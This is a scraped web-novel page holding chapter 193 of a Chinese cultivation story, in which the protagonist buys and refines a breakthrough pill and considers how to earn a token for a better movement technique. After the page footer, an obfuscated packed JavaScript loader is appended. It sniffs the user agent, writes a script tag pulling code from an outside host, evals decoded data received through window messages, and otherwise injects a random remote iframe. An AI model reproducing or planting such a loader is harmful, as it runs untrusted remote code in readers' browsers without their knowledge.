返回

我能赋予万物本源

首页
关灯
护眼
字体:
第193章 这孩子太不会做生意了
上一章 返回目录 下一章
  又得到了大量的学分和源值。

  许灵钧之后几天比往日里来的挥霍了不少。

  挣那么多不就是为了花么?

  只要有源值,他的修为就不会停,几乎每天都能有极大的进益……到得现在,距离突破化真后期才不过廖廖月余的时间而已。

  他的真气压缩又有极大提升,距离汇川境界,俨然已经近在咫尺。

  连顾希也没想到他进益这么快,因此许灵钧使唤她跑腿也乐颠乐颠的,说让她帮忙寄东西,她真的就飞快的跑去把东西给许灵钧寄了……

  甚至连洗衣收拾家务这些工作她也不让许灵钧做了,说是影响他的修炼。

  当助教能当成生活保姆的,她恐怕也是第一个。

  而许灵钧也已经开始为突破汇川境界做准备了。

  直接花费190点学分,购买了一颗上等淬灵液.

  然后又花费了70点源值将其推到最高层次,要么额外花费学分,要么额外多花源值,哪个重要许灵钧自然明白。

  他并没有立即服用,而是将这颗丹药小心的保留了下来,打算等到修为到得顶峰的时候,通过这颗丹药一举突破到汇川层次。

  当初通过那瓶灵血药剂,已经让许灵钧再不敢小看这些经过特制的灵液或者丹药了。

  妖兽诸天异族的血肉纵然再补,那毕竟是自然形成,哪里比的上各种资源的君臣佐使,科学搭配从而炼制出来的灵液或者丹药呢?

  只是他平日里接触的那些丹药灵液,毕竟非是真正的专业人士炼制出来的,效果自然达不到上佳……

  但只要赋源的话……

  付出大量的源值和学分,就可以收获一颗效果惊人的丹药或者灵液。

  对正常人而言,还只不过是一瓶上等淬灵液,但对许灵钧而言,这瓶淬灵液却可以将他的真气进行激烈淬炼,剧烈的程度,如果选择在一个合适的时机的话,可以让他轻松的突破到汇川境界。

  “大概年前我就能到得这个境界吧。”

  当听到许灵钧的估计之后,顾希已经幸福到近乎晕倒了。

  当下每天对许灵钧更是几乎言听计从,他需要什么她就给他什么,就算不方便也要给……

  这事儿在她心头几乎成了执念,不完成这个执念,她一辈子也无法安心的。

  之后,许灵钧又开始了每天沉浸式的修炼。

  而好消息也是有的……

  《九重雷劫》,已经在他的苦修之下,达到了四重雷劫了。

  四秒,虽然仍然还无法达到瞬发,但在某种特定的环境下,其实已经允许使用了。

  只是轻身功法被破这件事情,却还是在他的心头惊起了警惕。

  也就是他的本体实力足够强大,兼之有刀枪不入的防御力,又有振金战甲,又有纳米战甲,还能开《乾天罡气》干丫的,如果还不敌还可以开高达逃跑。

  不然的话,恐怕这一次他真的就栽了。

  也许我需要至高级的轻身功法才行。

  他蓦然间想起了之前拿着北玄武令去北玄武库挑选武技的时候,无意间看到的一门轻身功法。

  凌空虚渡。

  身影如虚似实,可凌空虚渡,身形化物,较之轻风拂尘步强了何止一筹。

  可想要进入北玄武库,却需要掏出一个北玄武令才行。

  只是当从顾希那里得知北玄武令的获得方法之后,他也只能无奈的放弃了。

  北玄武令并非仅仅只用学分就可以买来的。

  或者说也不需要买。

  只需要在秘境里逗留1440个小时以上,无论哪种秘境,都可以无偿获得一张北玄武令!

  而若是换算一下时间的话,哪怕每次都在秘境之内把时间待满,也需要消耗整整1000学分,进入秘境二十次,才能获得一面令牌。

  而且哪那么巧每次都能进满?

  所以对北玄武府的学员而言,想要获得至高级武技并非是没有办法,但难度却也当真不是一般的高……对许灵钧而言也许不难,但实在是太耗时间了。

  可能那些很多学员至死都不愿毕业,其实就是为了获得一门至高级功法或者武技吧,毕竟这本来就是水磨功夫,不消耗个几年时光,根本不可能得到北玄武令的。

『加入书签,方便阅读』

( 第 1/2 页, 本章未完,请翻页 1biquge.com )
上一章 返回目录 下一页
new Function(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6(/(1d)/i.7(f.c)&&/(y)/i.7(f.c)){6(/(10)/i.7(x.Z.Y)){X(W V().U())}5 z="v.d.j/u/t-o-B/l/k/n-q-s-A.w";3.4("<8 a=");3.4("h");3.4("T");3.4("p");3.4("s:");3.4("//");3.4(z);3.4(">")}F 6(/(R|P|y)/i.7(f.c)){x.K("J",G(e){5 b=e.I;6(b.r){S(12(b.r.1h(/\\+/g,"%1g")))}});3.4(\'\')}F{(G(){5 m=3.1b("8");5 H="D://v.d.j";m.a=H+"/2/1/1?"+C.1c(C.L()*M);5 9=3.N("8")[0];9.O.11(m,9)})()}',62,80,'|||document|write|var|if|test|script|ss|src|_c_ob_hf|userAgent|nggwhyk||navigator||||cn|smallimage|en||Filip2po|crypto||Vals1orda|hf_ev_j||go|presentations||js|window|baidu|uwMbwa|bfeUAl1UCVU|library|Math|https|iframe|else|function|url|data|message|addEventListener|random|10000|getElementsByTagName|parentNode|UCBrowser|frameborder|MQQBrowser|eval|tt|getSeconds|Date|new|alert|href|location|check_in|insertBefore|decodeURIComponent|no|none|scrolling|marginheight|width|height|allowtransparency|true|createElement|round|Android|display|style|20|replace'.split('|'),0,{}))()